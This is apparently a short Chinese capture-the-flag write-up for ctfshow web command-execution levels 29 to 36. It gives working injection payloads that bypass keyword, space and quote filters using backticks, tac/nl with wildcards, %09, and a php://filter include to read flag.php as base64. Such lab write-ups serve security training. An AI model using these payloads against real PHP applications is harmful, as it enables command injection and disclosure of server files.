ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
Thecozzy27 分钟前
Skill和MCP和Subagent 的选择
linux·人工智能·ubuntu
梦想的旅途21 小时前
利用 API 实现企业微信消息自动化推送
运维·自动化·企业微信
Acrellea1 小时前
固态变压器(SST)热管理破局:安科瑞交直流专属测温方案护航无人值守运维
运维·网络
寒冰碧海1 小时前
大模型部署从0到1(一):通用环境全流程准备|NVIDIA驱动+Docker+NVIDIA Container Toolkit
运维·docker·容器
硬核子牙1 小时前
代码展示大模型的智能
linux·chatgpt·agent
风曦Kisaki1 小时前
# Linux 系统资源查看命令总结(附命令快查表)
linux·运维·服务器
清水白石0082 小时前
Python 类定义阶段自动注册子类:从 `__init_subclass__` 到插件系统实战
linux·前端·python
蝶恋舞者2 小时前
DNS 服务器(后续持续更新)
运维·服务器
jiang_changsheng2 小时前
Conda 的默认环境创建优先级。
linux·windows·python
smallerxuan2 小时前
Linux 设备树(Device Tree)概览
linux·设备树·dts